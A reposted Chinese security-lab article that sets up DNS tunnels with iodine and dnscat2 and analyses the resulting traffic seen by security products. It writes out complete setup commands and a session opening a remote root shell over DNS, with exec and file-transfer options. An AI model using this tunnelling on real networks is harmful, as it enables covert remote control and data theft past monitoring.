您当前的位置：首页 > 电脑百科 > 安全防护 > 黑客技术

基于安全产品DNS隧道流量分析

时间：2023-06-01 12:31:59 来源：作者：合天网安实验室

+ 加入收藏

声明：

本文仅限于技术讨论与分享，严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负，与本号及原作者无关。

域名准备

选择哪家的云都没问题，这里我选择的TX云，因为之前注册过了，自己拿来做个流量分析不成问题。

域名添加解析记录

需要准备自己的vps作为DNS隧道的服务端，且需要添加ns记录

iodined

关闭53端口关闭开机自启

systemctl stop systemd-resolved

systemctl disable systemd-resolved

之后53端口已关闭

启动服务端

iodined -f -c -P 1qaz@WSX 192.168.100.1 ns.xxx.xyz -DD

参数说明

-f：在前台运行

-c：禁止检查所有传入请求的客户端IP地址。

-P：客户端和服务端之间用于验证身份的密码。

-D：指定调试级别，-DD指第二级。“D”的数量随级别增加。

客户端

iodine -f -P 1qaz@WSX ns.aligoogle.xyz -M 200

客户端连接正常，且服务端显示客户端连接成功

查看客户端网卡，因为配置的时候一直不太稳定，所以这里服务端分配的虚拟网卡我更换为了192.168.121.1

测试隧道是否通信

延时比较高，也不稳定。

通过隧道连接目标主机

ssh -p 2222 root@192.168.121.2

这里我换ssh的端口了

但是发现安全设备在连接高危端口的时候无告警

流量分析

抓取dns0网卡的流量

tcpdump -i dns0 port 53 -w file.pcap

参数-i 指定网卡， port 指定端口，DNS使用53端口，-w 写入文件。

查看日志发现所有的流量都是DNS日志，但是目的都为自己的VPS

试错

本来我是想使用穿透工具通过隧道穿透的，这里使用nps做隧道走socks，想走虚拟网卡需要修改nps配置文件

./npc -server=192.168.120.1:63323 -vkey=n4jg3lrvg19qlqth -type=tcp

查看nps上线后，需要做端口转发，不做端口转发无法直接使用虚拟地址的隧道,这里其实没有这么走的意义

但是这里发现行不通，参考了一些文章，发现某位师傅写的有点儿问题，这里大可不必，没有所谓的套层+转口转发，单一走隧道都不稳定以及卡的要死，怎么玩儿套娃。

dnscat2搭建

安装准备

git clone https://Github.com/iagox86/dnscat2.git

cd dnscat2/server/

curl -sSL https://get.rvm.io | bash

source /etc/profile.d/rvm.sh

rvm install 2.6.0

source /etc/profile.d/rvm.sh

rvm use 2.6.0

gem install bundler

bundle install

ruby ./dnscat2.rb

需要注意这里开放vps的53的udp端口

firewall-cmd --zone=public --add-port=53/udp --permanent

firewall-cmd --reload

国内服务器腾讯云的话需要更换源，下载文件需要科学上网，境内下载tools找不到服务

客户端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/client/

make

./dnscat --dns server=IP,port=53 --secret=f361f307f523b07352d0bab1b765a888 //直连模式

./dnscat --dns server=ling.domAIn --secret=1qaz2wsx //中继模式直连模式

Server:

Client:

中继模式ruby ./dnscat2.rb ns.domain -e open -c 1qaz2wsx --no-cache

客户端

./dnscat --dns domain=ling.domain --secret=1qaz2wsx

./dnscat --dns server=www.domain --secret=1qaz2wsx

服务端命令

sessions 列出所有session

session -i 2 进入session 2

shell:创建交互式shell

suspend:返回上一层

exit:退出

clear（清屏）

delay（修改远程会话超时时间）

exec（执行远程机上的程序）

shell（得到一个反弹shell，此处必须在1::command(kali)中使用）

download/upload（两端之间上传下载文件）

listen <本地端口> <控制端IP/127.0.0.1>:<端口>（端口转发，此处）（此处必须在1::command(kali)中使用） dnscat2> session -i 1

New window created: 1

history_size (session) => 1000

Session 1 Security: ENCRYPTED AND VERIFIED!

(the security depends on the strength of your pre-shared secret!)

This is a command session!

That means you can enter a dnscat2 command such as

'ping'! For a full list of clients, try 'help'.

command (ubuntu) 1> whoami

Error: Unknown command: whoami

command (ubuntu) 1> shell

Sent request to execute a shell

command (ubuntu) 1> New window created: 2

Shell session created!

whoami

Error: Unknown command: whoami

command (ubuntu) 1> session -i 2

New window created: 2

history_size (session) => 1000

Session 2 Security: ENCRYPTED AND VERIFIED!

(the security depends on the strength of your pre-shared secret!)

This is a console session!

That means that anything you type will be sent as-is to the

client, and anything they type will be displayed as-is on the

screen! If the client is executing a command and you don't

see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh (ubuntu) 2> whoami

sh (ubuntu) 2> root

tcpdump -i dns0 port 53 -w file.pcap

流量包内的数据内容

请求包和回包区别不大，在返回包多了域名的信息的TXT记录加密传输信息，可以看到DNS的查询请求的域名信息前的一串数据，里面就是加密过后的交互数据。

其他工具

跟工具关系不大，隧道的话DNS只要ip和域名没标签，其实走的都是udp的协议，所以在安全设备上都是流量数据，其类似的工具有dns2tcp等，但是总体来讲该隧道比较慢不稳定，比较慢且传输不支持大流量传输。

Tags：DNS 点击:() 评论:()

声明：本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作，风险自担。如有任何标注错误或版权侵犯请与我们联系，我们将及时更正、删除。

▌相关推荐

Win10/Win11和 macOS用户反馈：谷歌云服务“捆绑”系统 DNS 设置

IT之家 4 月 6 日消息，谷歌公司承认旗下的 Google One 订阅服务中存在问题，在 Windows 10、Windows 11 以及 macOS 系统上会更改系统 DNS 设置，变更为 8.8.8.8 地址。Google On...【详细内容】

2024-04-08　　Search: DNS 点击:(7)　　评论:(0)　　加入收藏

哪些因素会导致 DNS 查询速度变慢？

DNS查询的作用是将域名（网址）解析为IP地址，这个过程叫做DNS域名解析。具体来说，当用户在浏览器中输入一个网址时，DNS查询会被触发，将该域名解析为对应的IP地址。这样，计算机就能够...【详细内容】

2024-01-26　　Search: DNS 点击:(49)　　评论:(0)　　加入收藏

简易百科之什么是DNS？

在互联网的世界中，DNS扮演着至关重要的角色，它是Domain Name System的缩写，中文意思是域名系统。没有DNS，我们在网络上将无法通过域名来访问网站，只能通过IP地址来访问，这无疑增加...【详细内容】

2024-01-25　　Search: DNS 点击:(46)　　评论:(0)　　加入收藏

DNS的工作原理及其作用

DNS，全称为Domain Name System，即域名系统，是一种用于将域名和IP地址相互映射的分布式数据库系统。它将可读的域名转换为对应的IP地址，使得用户可以更方便地通过域名来访问网络...【详细内容】

2024-01-25　　Search: DNS 点击:(40)　　评论:(0)　　加入收藏

DNS解析是什么？DNS解析在网络通信中作用有哪些？

在网络通信过程中，DNS解析起着至关重要的作用，它负责将人们便于理解和记忆的域名翻译成计算机能够识别的IP地址，从而实现人们通过域名进行网络通信的目的。DNS解析的原理IP是互...【详细内容】

2024-01-23　　Search: DNS 点击:(42)　　评论:(0)　　加入收藏

DNS解析的速度该怎么提高？四个点可以注意并付诸实施的

在我们平时上网时，每次敲击网址进入网站时，必须用到DNS解析功能，它关乎到你能否顺畅地浏览网站内容。也就是所，如果DNS解析的速度跟不上，就会致使后期出现无法访问的问题发生。那...【详细内容】

2024-01-10　　Search: DNS 点击:(139)　　评论:(0)　　加入收藏

2024年需要重点关注的10种 DNS 类型

目前，针对域名系统（DNS）的攻击已经成为企业组织数字化发展中的一个严重问题，每年都有数千个网站成为此类攻击的受害者。据最近的研究数据显示，2023年企业组织与DNS攻击相关的损失...【详细内容】

2024-01-04　　Search: DNS 点击:(126)　　评论:(0)　　加入收藏

一文看懂DNS及其工作原理

Labs 导读想象一下你的智能手机联系人名单，就像是整个地球上的人的名字和联系方式列表。每当你想要给某人打电话或发短信时，你只需要在联系人名单中找到他们的名字，而不必记住...【详细内容】

2023-12-18　　Search: DNS 点击:(122)　　评论:(0)　　加入收藏

DNS缓存的作用是什么？四个方面的内容可以了解下

DNS缓存作为网络世界中的一项重要技术，其作用不可小觑。下面将从四个方面为大家详细介绍DNS缓存的作用，如果感兴趣的话，可以一起来看下吧。DNS缓存的作用是什么1、提升网络访问...【详细内容】

2023-12-08　　Search: DNS 点击:(194)　　评论:(0)　　加入收藏

DNS服务器加速：提升网络访问速度的秘密

在当今高度信息化的时代，网络已经成为我们获取信息、沟通交流的重要渠道。然而，我们在使用网络时，往往会遇到访问速度慢、加载时间长等问题。这些问题中，有些是由于网络带宽限制...【详细内容】

2023-12-06　　Search: DNS 点击:(106)　　评论:(0)　　加入收藏

▌简易百科推荐

小心“黑客”利用445端口攻击你的Win8系统！

Windows 8系统自带一个名为SMB（Server Message Block）的服务，使用445端口进行通信。这个服务主要用于文件共享和网络协议等功能，但是无良黑客也会利用这个服务来攻击你的电脑。...【详细内容】

2024-04-10　　　　潘小姐　　Tags:445端口　点击:(2)　　评论:(0)　　加入收藏

为什么黑客不去攻击微信钱包？

在这个数字化时代，网络安全已经成为我们生活中不可或缺的一部分。每当我们打开手机，使用微信钱包进行支付时，是否曾有过这样的疑问：为什么黑客不去攻击微信钱包？这个问题，就像是在...【详细内容】

2024-02-19　　猫探长情报局　　今日头条　　Tags:黑客　点击:(55)　　评论:(0)　　加入收藏

发条消息就能破解iPhone？苹果系统这次像被“内鬼”攻破的。。。

前几天，差评君在网上冲浪的时候，看到了一条相当震撼的消息：简单来讲，就是主打封闭安全的 iPhone ，不仅被攻击者发现了漏洞成功入侵，完全控制整个手机。更加抽象的是入侵的还是知名...【详细内容】

2024-01-26　　差评　　　　Tags:破解iPhone 　点击:(134)　　评论:(0)　　加入收藏

十种黑客攻击手段及防御方法

在互联网的世界里，网站安全犹如一座城堡，需要严密的防线来抵御各种攻击手段。以下是10种最常见的网络攻击手段，以及我们如何采取措施来保护我们的网站。1. 跨站脚本攻击：这是黑...【详细内容】

2024-01-21　　老吴讲IT　　　　Tags:黑客攻击　点击:(83)　　评论:(0)　　加入收藏

渗透测试中最常见的漏洞有哪些？

什么是渗透测试？渗透测试是一项安全测试，旨在模拟黑客的攻击方式，评估系统、网络或应用程序的安全性，发现潜在的安全漏洞并提出建议来修复它们。渗透测试中最常见的漏洞包括：1....【详细内容】

2024-01-11　　五湖联技术服务公司　　　　Tags:渗透测试　点击:(105)　　评论:(0)　　加入收藏

作为一名黑客/安全专家，应该掌握什么技能？熟悉哪些软件/工具？

作为一名合格的黑客/网络安全专家，应该具备一套全面的知识体系和实战技能，同时熟悉多种安全软件和工具。今天我们将根据目前市面上流行的一些应用程序，以及常规的安全防护措施，...【详细内容】

2023-12-11　　黑客联盟I　　　　Tags:黑客　点击:(140)　　评论:(0)　　加入收藏

黑客是如何入侵一个网站的？（网络安全人员应该了解的知识）

前不久阿里以及滴滴系统的大规模瘫痪足以唤起人们对网络安全的重视。我首先必须澄清的是，作为一个网络安全专家，我不提供或者鼓励任何违法的行为，包括未经授权的计算机系统入侵...【详细内容】

2023-12-07　　黑客联盟I　　　　Tags:黑客　点击:(176)　　评论:(0)　　加入收藏

网络黑客入侵解析：保护你的网络安全

在当今数字化快速发展的时代，网络安全问题逐渐成为人们关注的焦点。网络黑客入侵事件频发，给个人和企业带来了严重的威胁。本文将深入解析网络黑客入侵的常见手段和原因，并探讨...【详细内容】

2023-12-05　　小记青春　　　　Tags:黑客入侵　点击:(161)　　评论:(0)　　加入收藏

黑客滥用 Google 表单进行诈骗

研究人员最近发现滥用 Google 表单的垃圾邮件有所增加，攻击者首先在 Google 表单中创建新的问卷调查，并且利用受害者的电子邮件地址参与问卷调查，滥用 Google 表单的功能将垃圾...【详细内容】

2023-11-23　　区块软件开发　　今日头条　　Tags:黑客　点击:(220)　　评论:(0)　　加入收藏

黑客工具 Flipper Zero 曝光，可利用蓝牙弹出窗口崩溃 iPhone

据外媒 9to5Mac 报道，一种流行且廉价的黑客设备 Flipper Zero 今年 9 月首次出现，可通过制造蓝牙弹出窗口，向 iPhone 和 iPad 重复告诉发送垃圾内容，直到相关设备最终崩溃，不过直...【详细内容】

2023-11-20　　IT之家　　　　Tags:黑客工具　点击:(242)　　评论:(0)　　加入收藏

推荐资讯

网易再牵暴雪的手，实际	注意！密码、验证码都没
将他人商标设为搜索关	打破刚兑：投资者还能相
拜登坐不住了？罕见对美	黄金狂飙如何影响人民
重新审视2008年全球金	京东掷10亿现金扶持达

站内最新

栏目相关

· 小心“黑客”利用445端口攻击你的Win8系统！

· 为什么黑客不去攻击微信钱包？

· 发条消息就能破解iPhone？苹果系统这次像被“内鬼”攻破的。。。

· 十种黑客攻击手段及防御方法

· 渗透测试中最常见的漏洞有哪些？

· 作为一名黑客/安全专家，应该掌握什么技能？熟悉哪些软件/工具？

· 黑客是如何入侵一个网站的？（网络安全人员应该了解的知识）

· 网络黑客入侵解析：保护你的网络安全

· 黑客滥用 Google 表单进行诈骗

· 黑客工具 Flipper Zero 曝光，可利用蓝牙弹出窗口崩溃 iPhone

· 微软：Octo Tempest是最危险的金融黑客组织之一

· 详解六种最常见的软件供应链攻击

· 网络安全中的渗透测试主要有几个方面

· 想自学黑客技术？这些网络安全学习网站收藏好

· 保护智能家居免受黑客攻击的八种方法

· DarkGate恶意软件通过消息服务传播

· 黑客修改在线商店的404页面以窃取信用卡信息

· 如何入门学习黑客技术？如何选择编程语言？如何选择适合黑客的操作系统？

· 如何避免密码被AI击键模式检测识别

· 你以为的USB充电线居然是带Wi-Fi的黑客电脑

站内热门